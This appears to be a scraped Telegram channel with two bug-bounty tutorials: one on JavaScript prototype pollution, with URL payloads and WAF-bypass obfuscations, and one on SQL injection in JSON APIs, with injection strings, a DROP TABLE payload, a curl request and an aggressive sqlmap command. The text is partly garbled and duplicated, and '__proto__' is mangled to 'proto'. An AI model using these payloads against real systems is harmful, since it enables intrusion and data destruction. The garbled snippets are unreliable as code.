Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
To access properties of this object, we can use two methods:
1-Dot notation:
Bracket notation:
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
2️⃣ Bracket Notation Approach
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
If the WAF still blocks requests, we can use nested obfuscation techniques:
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
let userInfo = {
"username": "admin",
"password": "1qaz2wsx3edc",
"email": "admin@victim.com"
};To access properties of this object, we can use two methods:
1-Dot notation:
userInfo.username;
Bracket notation:
userInfo["username"];
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
var name = "Arya";
console.log(name.proto);
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
a.proto;ploiting Prototype Pollution
Ex
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
http://target.com/?proto.arya=arya
2️⃣ Bracket Notation Approach
http://target.com/?proto[arya]=arya
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya
If the WAF still blocks requests, we can use nested obfuscation techniques:
/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
let test = {};
console.log(test.arya); // Output: " arya"
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
❤7👍6🔥4
ExploitQuest
A Real-World Example of Prototype Pollution Exploitation A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype…
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.
SQL Injection (SQLi), a well-known vulnerability, is still relevant and can exist within APIs if input validation and query handling are not properly secured.
This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.
━━━━━━━━━━━━━━━
•POST requests with JSON bodies
•GraphQL endpoints
•PUT/PATCH methods with nested objects
•Endpoints with dynamic filters or search queries
•Database-related error messages in API responses
•Unusual delays in response (time-based blind SQL)
•Reflection of user input in responses or logs
•Status code anomalies (e.g., 500 Internal Server Error)
━━━━━━━━━━━━━━━
Let’s say you’re testing the following API
POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json
{
"username": "admin"
}
Try payload injection:
{
"username": "' OR '1'='1"
}
🤖Or blind time-based:
{
"username": "' OR SLEEP(5)--"
}curl -X POST https://vulnerable.site/api/user/details \
-H "Content-Type: application/json" \
-d '{"username": "' OR 1=1 --"}'
{
"filter": {
"email": "admin@site.com' OR '1'='1"
}
}
Or nested objects:
{
"user": {
"id": "1'; DROP TABLE users;--"
}
}•Burp Suite (Pro): Use the Intruder or Repeater to fuzz JSON payloads.
•SQLMap with --data and --json flags:
sqlmap -u https://vulnerable.site/api/login \
--data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
--level=5 --risk=3 --batch
•Postman: Manual testing and injection
•Nuclei with custom templates
━━━━━━━━━━━━━━━━━━
Always analyze API docs (Swagger/OpenAPI) for parameter hints.
•Use Burp Collaborator for detecting out-of-band SQLi.
•Test for second-order injection, especially in multi-step flows.
•Try JSON-specific encoding, like:
•Unicode: \u0027 OR \u0031=\u0031
•Base64 in API params
━━━━━━━━━━━━━━━━━━
🛡️ Mitigation (For Blue Team Awareness)
Use parameterized queries / prepared statements
•Sanitize and validate input rigorously
•Apply WAF rules and anomaly detection for API behavior
•Implement rate limiting and access control
━━━━━━━━━━━━━━━━━━
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.
Happy hacking and see you next time!
#CyberSecurity #MSSQL #EthicalHacking #json
#api
#JavaScriptSecurity
#WebSecurity
#BugBounty #EthicalHacking #CyberSecurity
#SecurityResearch #WebHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍2🥰1